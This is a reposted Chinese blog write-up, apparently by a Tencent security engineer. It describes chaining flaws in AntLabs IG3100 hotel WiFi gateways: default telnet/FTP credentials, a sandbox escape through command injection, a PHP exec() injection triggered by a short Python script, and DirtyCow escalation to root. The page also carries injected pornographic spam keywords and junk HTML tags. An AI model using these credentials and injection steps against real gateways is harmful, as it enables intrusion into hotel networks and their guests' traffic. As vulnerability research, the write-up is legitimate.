曰韩免费无码AV一区二区,男女啪啪高清无遮挡免费,精品国产自在精品国产精

<delect id="ygmw2"><rp id="ygmw2"></rp></delect>
      1. <object id="ygmw2"><option id="ygmw2"></option></object>
        <object id="ygmw2"><option id="ygmw2"></option></object>

        您當前的位置:   首頁 > 新聞中心
        轉:騰訊安全工程師的技術思路
        發布時間:2018-12-05 11:35:36   閱讀次數:

        騰訊安全工程師在新加坡友情檢測酒店wifi安全,以下是其發布的博客原文:


        這幾天在新加坡參加 HITB,比起各類料理,更讓我感興趣的是它的酒店 WiFi。去了三家酒店,WiFi 用的都是統一套認證系統,是 AntLabs 的 IG3100 的設備。連接到 WiFi 后會彈出一個地址為 ezxcess.antlabs.com 的認證頁面:

        轉:騰訊安全工程師的技術思路(圖1)
        這個地址一般來說都是解析到 traceroute 第二跳的 IP 段的最后一位地址為 2 的主機上,比如 traceroute 的結果為 10.10.1.1,那么會解析到 10.10.1.2。 秉持著我到一個酒店日一個的精神,我對于這套系統進行了一個深入的測試,最后通過串聯了 4 個漏洞拿到系統的 root 權限。


        1. Backdoor Accounts

        通過 Google,我找到了這個系統測兩個默認口令。一個是 telnet 的帳號,帳號密碼為 console / admin,另外一個是 ftp 的帳號,帳號密碼為 ftponly / antlabs。很幸運,遇到的大部分酒店這兩個帳號都沒有禁用。
        登錄進去后,發現帳號在一個受限的 shell 下,看了看 shell 自帶的命令,和 Linux 自帶的一些命令差不多,甚至可以用一些命令查看到沙盒之外的信息,比如 ps -ef:

        轉:騰訊安全工程師的技術思路(圖2)

        利用 netstat -l 發現這個系統存在一個 MySQL,但是僅監聽在 127.0.0.1。同時還發現了 6000 端口是一個 SSH 服務端口。

        轉:騰訊安全工程師的技術思路(圖3)

        利用 SSH,我可以建立一個端口轉發,將僅監聽在 127.0.0.1 的 3306 端口轉發到我的MacBook 上,然后進行連接操作。

        轉:騰訊安全工程師的技術思路(圖4)

        看了看,爆了個 ERROR 2027 (HY000): Malformed packet 的錯誤,nc 上去看了一下,發現這個服務器的 MySQL 是 MySQL 4.1.2,我真的沒見過這么古老的 MySQL 了。雖然我命令行連接不了,但是我還有 Navicat。用 Navicat 連接果然可以,但是問題來了,我不知道 MySQL 的密碼是什么。


        2. SaNDBox Escape

        剛才說到,telnet / ssh 連接進去后是在一個受限的 shell 里,那么作為黑客的一個特點就是看到沙盒就手癢。怎么逃逸沙盒,這個需要看 shell 提供了什么功能了。運行 help 看看:

        轉:騰訊安全工程師的技術思路(圖5)

        經過一番思考,我發現,這個 shell 除了一些 Linux 的系統命令外,還有一些看起來不是 Linux 自帶的命令,比如 sshtun、usage_log、vlandump 等等。這些命令我猜測是一些腳本或者二進制文件寫的,來方便管理員進行一些操作。那么既然是開發人員編寫的,那么就有可能有漏洞,特別是命令注入漏洞。嘗試了幾次之后,我成功利用了 vlandump 逃逸了沙盒:

        轉:騰訊安全工程師的技術思路(圖6)

        沙盒是逃逸了,但是我還是絕望的發現,我被 chroot 了。chroot 我是繞不過去了,只能翻翻配置文件來尋找樂子。然后我驚喜地在 /etc 目錄發現了 MySQL 的密碼:

        轉:騰訊安全工程師的技術思路(圖7)

        那么有了密碼,又能訪問端口,我們就可以連接 MySQL 登錄數據庫了。


        3. File Read

        在數據庫找到了管理員的帳號密碼,成功登錄。接下來就是拿 shell 的時候了,那么需要對這個系統做個代碼審計。

        轉:騰訊安全工程師的技術思路(圖8)

        MySQL root 用戶的好處就是可以讀文件,但是我發現我讀 /etc/httpd/conf.d/httpd.conf 居然顯示沒有權限,又猜不到 Web 的目錄,場面一度十分尷尬。
        峰回路轉,我在 shell 內 ps -ef 的時候發現了一個奇怪的東西:

        轉:騰訊安全工程師的技術思路(圖9)

        tcPSErver 命令在 1001 啟動了個端口,轉交給 PHP 來處理。這個東西看起來好搞,利用 load_file 讀取后,發現是用 IonCube 加密過的,網上隨便找了個平臺解了個密,得到代碼:

        轉:騰訊安全工程師的技術思路(圖10)


        4. Limited RCE

        讀了讀代碼,發現程序存在一個 RCE。

        function logSyslog($msg){global $ip;global $buffer;$msg = trim($msg);if ($msg != '') {exec('/usr/bin/logger -p lpr.info -t Acc_Printer -- "Printer ' . $ip . ' ' . $buffer . ' ' . $msg . '"', $out, $ret);if ($ret == 0) {return TRUE;}}return FALSE;}

        這里的 msg 帶入到 exec 中,并且直接雙引號包裹。那么可以直接用反引號來執行命令。通讀了一遍代碼后,我發現除了 MySQL 查詢語句居然沒有其他可控的點。代碼如下:

        function generateAccount($buffer){global $ip;global $print_previous;global $timeformat;global $dateformat;global $transactionNumberDigit;global $printer_path;global $db;$copy_label = '';if ($buffer != $print_previous) {$query = 'select * FROM ant_services.Acc_Printer_Button JOIN ant_services.Acc_Printer ON Acc_Printer_Button.printer_id=Acc_Printer.printer_id WHERE button_code='' . mysql_real_escape_string($buffer) . '' AND printer_ip='' . mysql_real_escape_string($ip) . ''';$rsbutton = $db->query($query);if (!($button = $rsbutton->fetch)) {logSyslog('failed to read button configuration from database. QUERY = ' . $query);return FALSE;}

        往上追溯一下調用這個函數的地方,我發現了更絕望的事情:

        if (trim($buffer) == '(') {$buffer .= fread(STDIN, 14);if (!strstr($print_previous, $buffer)) {generateAccount($buffer);}

        我們只有 14 個字節的可控點,去掉首尾的反引號后還有 12 位。這太他媽 CTF 了吧。
        另外還有一個限制:

        while (true) {unset($printer_details);clearstatcache;if (!($res = $db->query('select * FROM ant_services.Acc_Printer WHERE printer_ip='' . mysql_real_escape_string($ip) . '' AND status='enable''))) {logSyslog('failed to query database to get printer details');exit(1);}if ($res->rowCount == '0') {logSyslog('is not found in registered printer list database ');exit(1);}

        我想執行命令的話,需要是在 ant_services.Acc_Printer 能查到我的 IP 的,不過對于擁有數據庫權限的我們來說,不是什么大問題。
        寫了個腳本方便執行:

        import zio, sysio = zio.zio(('192.168.10.2', 1001))io.write('(`%s`)' % sys.argv[1])

        不知道大家還記得之前提過有一個 FTP 的事情嗎?我發現執行命令的結果會寫在 FTP 下面的 log/acc/acc.log,這也算是意外之喜了。

        轉:騰訊安全工程師的技術思路(圖11)


        5. Unlimited RCE

        12 個字節怎么想怎么難受,但是想了想,我們有 MySQL,能寫文件。如果把要執行的命令寫到 /tmp 目錄下,接著利用 bash /tmp/a 執行,只需要 11 個字節,那么就非常順利的將受限的命令執行轉化為任意命令執行了。

        轉:騰訊安全工程師的技術思路(圖12)


        6. DirtyCows

        沒啥好說的了,這個 CentOS 4 的版本,隨便提權啦。

        轉:騰訊安全工程師的技術思路(圖13)

        攬閣信息可提供的部分安全產品和解決方案信息

        聯系攬閣信息,您可以獲取到更多滿足全球合規性要求的信息安全產品資料,以及相關的整體解決方案的相關資料。如:


        您還可以得到攬閣信息所提供的優質服務。

        攬閣信息 · 值得您信賴的信息安全顧問!


        相關閱讀

        購買咨詢電話
        021-54410609
        曰韩免费无码AV一区二区,男女啪啪高清无遮挡免费,精品国产自在精品国产精